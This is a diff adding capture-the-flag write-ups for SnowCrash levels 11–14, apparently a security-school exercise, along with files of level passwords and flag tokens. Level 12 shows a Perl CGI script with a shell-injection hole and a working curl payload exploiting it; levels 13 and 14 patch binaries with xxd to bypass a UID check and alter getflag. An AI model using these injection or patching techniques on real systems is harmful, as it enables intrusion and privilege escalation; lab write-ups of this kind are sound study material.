maiboyer/level11/passwd Normal file
View file

@ -0,0 +1 @@
feulo4b72j7edeahuete3no7c

117
maiboyer/level12/README.md Normal file
View file

@ -0,0 +1,117 @@
# Level 12
## how to login
username: level12
password: fa6v5ateaw21peobuub8ipe6s
## Goal
run `getflag` as user `flag12`
## Actually doing something
```bash
level12@SnowCrash:~$ ll
total 16
dr-xr-x---+ 1 level12 level12 120 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level12 level12 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level12 level12 3518 Aug 30 2015 .bashrc*
-rwsr-sr-x+ 1 flag12 level12 464 Mar 5 2016 level12.pl*
-r-x------ 1 level12 level12 675 Apr 3 2012 .profile*
```
Perl again...
```perl
level12@SnowCrash:~$ cat level12.pl
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";
sub t {
$nn = $_[1];
$xx = $_[0];
$xx =~ tr/a-z/A-Z/;
$xx =~ s/\s.*//;
@output = `egrep "^$xx" /tmp/xd 2>&1`;
foreach $line (@output) {
($f, $s) = split(/:/, $line);
if($s =~ $nn) {
return 1;
}
}
return 0;
}
sub n {
if($_[0] == 1) {
print("..");
} else {
print(".");
}
}
n(t(param("x"), param("y")));
```
a bit more involed, lets try to make it more pretty
```perl
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";
sub t {
$arg2 = $_[1];
$arg1 = $_[0];
$arg1 =~ tr/a-z/A-Z/;
$arg1 =~ s/\s.*//;
@output = `egrep "^$arg1" /tmp/xd 2>&1`;
foreach $line (@output) {
($f, $s) = split(/:/, $line);
if($s =~ $arg2) {
return 1;
}
}
return 0;
}
sub n {
if($_[0] == 1) {
print("..");
} else {
print(".");
}
}
n(t(param("x"), param("y")));
```
when looking at this, we basically spot an `egrep` meaning that we have a shell injection.
lets look at what is given to this string
first of all, we get called with two argument, lets call them by their http parameter names `x` and `y`
in the script they are also named `arg1` for `x` and `arg2` for `y`
arg2 doesn't matter for us, so lets ignore it
arg1 is converted to uppercase, and then we only keep erverything up to the first space;
so we want to execute something like last time, meaning that we want to instert something to stop the current comment
`";cmdhere`
but the issue is that we need to have a command in uppercase (because everuthing gets convert to uppercase), however the only directory we can write to is `/tmp` which is in lowercase...
Alas this doesnt matter since we are in shell land, and we can say `/*/GETOK` to refer to the `/tmp/GETOK` script
```bash
level12@SnowCrash:~$ curl "localhost:4646?y=%22%3B/*/GETTOK%3B%22" && cat /tmp/flag
..Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
```

1
maiboyer/level12/flag Normal file
View file

@ -0,0 +1 @@
g1qKMiRpXf53AWhDaU7FEkczr

1
maiboyer/level12/passwd Normal file
View file

@ -0,0 +1 @@
fa6v5ateaw21peobuub8ipe6s

100
maiboyer/level13/README.md Normal file
View file

@ -0,0 +1,100 @@
# Level 0X
## how to login
username: level0X
password: g1qKMiRpXf53AWhDaU7FEkczr
## Goal
run `getflag` as user `flagXX`
## Actually doing something
```bash
level13@SnowCrash:~$ ll
total 20
dr-x------ 1 level13 level13 120 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level13 level13 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level13 level13 3518 Aug 30 2015 .bashrc*
-rwsr-sr-x 1 flag13 level13 7303 Aug 30 2015 level13*
-r-x------ 1 level13 level13 675 Apr 3 2012 .profile*
level13@SnowCrash:~$ file level13
level13: setuid setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xde91cfbf70ca6632d7e4122f8210985dea778605, not stripped
```
A real binary !
```c
int main(int argc, const char **argv, const char **envp)
{
__uid_t uid; // eax
char *tok; // eax
if ( getuid() != 4242 )
{
uid = getuid();
printf("UID %d started us but we we expect %d\n", v3, 4242);
exit(1);
}
tok = ft_des("boe]!ai0FB@.:|L6l@A?>qJ}I");
return printf("your token is %s\n", tok);
}
char *__cdecl ft_des(char *s)
{
unsigned int i; // [esp+2Ch] [ebp-1Ch]
int n; // [esp+30h] [ebp-18h]
int j; // [esp+34h] [ebp-14h]
int k; // [esp+38h] [ebp-10h]
char *str; // [esp+3Ch] [ebp-Ch]
str = strdup(s);
n = 0;
for ( i = 0; strlen(str) > i; ++i )
{
if ( n == 6 )
n = 0;
if ( (i & 1) != 0 )
{
for ( j = 0; *(char *)(n + 134514368) > j; ++j )
{
if ( ++str[i] == 127 )
str[i] = 32;
}
}
else
{
for ( k = 0; *(char *)(n + 134514368) > k; ++k )
{
if ( --str[i] == 31 )
str[i] = 126;
}
}
++n;
}
return str;
}
```
This looks complicated, when running the executable we get thrown in the UID mismatch branch.
Either we reverse the ft_des (compile it on our own and runnit), or I want to try to patch the binary such that it wants to NOT have the given uid it should be possible easily
```bash
level13@SnowCrash:/tmp/l13$ xxd level13 >level13.xxd.orig
level13@SnowCrash:/tmp/l13$ diff level13.xxd.orig level13.xxd.patched
90c90
< 0000590: e4f0 83ec 10e8 e6fd ffff 3d92 1000 0074 ..........=....t
---
> 0000590: e4f0 83ec 10e8 e6fd ffff 3d92 1000 0075 ..........=....t
level13@SnowCrash:/tmp/l13$ xxd -r level13.xxd.patched >level13.patched
level13@SnowCrash:/tmp/l13$ chmod +x level13.patched
level13@SnowCrash:/tmp/l13$ ./level13.patched
your token is 2A31L79asukciNyi8uppkEuSx
```
this simple change make the `je` opcode that does the check for the uid into an `jne` aka an `!=`
meaning that we fail ONLY if we have an uid of 4242 instead of failing if we have an uid that isnt 4242

1
maiboyer/level13/flag Normal file
View file

@ -0,0 +1 @@
2A31L79asukciNyi8uppkEuSx

1
maiboyer/level13/passwd Normal file
View file

@ -0,0 +1 @@
g1qKMiRpXf53AWhDaU7FEkczr

48
maiboyer/level14/README.md Normal file
View file

@ -0,0 +1,48 @@
# Level 14
## how to login
username: level14
password: 2A31L79asukciNyi8uppkEuSx
## Goal
run `getflag` as user `flag14`
## Actually doing something
there is nothing -> let have fun with `getflag` binary
```bash
user14@SnowCrash:/tmp/gf$ mkdir -p /tmp/gf && cd /tmp/gf && cp $(which getflag) getflag.orig
user14@SnowCrash:/tmp/gf$ xxd getflag.orig > getflag.xxd.orig
user14@SnowCrash:/tmp/gf$ cat <<EOF >getflag.patch
206c206
< 0000cd0: 89c3 c704 244e 9104 08e8 26f9 ffff 895c ....$N....&....\
---
> 0000cd0: 89c3 c704 2420 9204 08e8 26f9 ffff 895c ....$N....&....\
EOF
user14@SnowCrash:/tmp/gf$ # apply the patch
user14@SnowCrash:/tmp/gf$ xxd -r getflag.xxd.patched > getflag.patched
```
after applying this patch, we need to perform the level06 trick again so we have the correct UID
This patched modified the string pointed in the getflag binary for the UID 3006 is actually the string for the last uid
after this is done we have the flag
```bash
7QiHafiNa3HVozsaXkawuYrTstxbpABHD8CPnHJ
```
let check it
```bash
level14@SnowCrash:/tmp/gf$ su flag14
Password:
Congratulation. Type getflag to get the key and send it to me the owner of this livecd :)
flag14@SnowCrash:~$ getflag
Check flag.Here is your token : 7QiHafiNa3HVozsaXkawuYrTstxbpABHD8CPnHJ
```

1
maiboyer/level14/flag Normal file
View file

@ -0,0 +1 @@
7QiHafiNa3HVozsaXkawuYrTstxbpABHD8CPnHJ

1
maiboyer/level14/passwd Normal file
View file

@ -0,0 +1 @@
2A31L79asukciNyi8uppkEuSx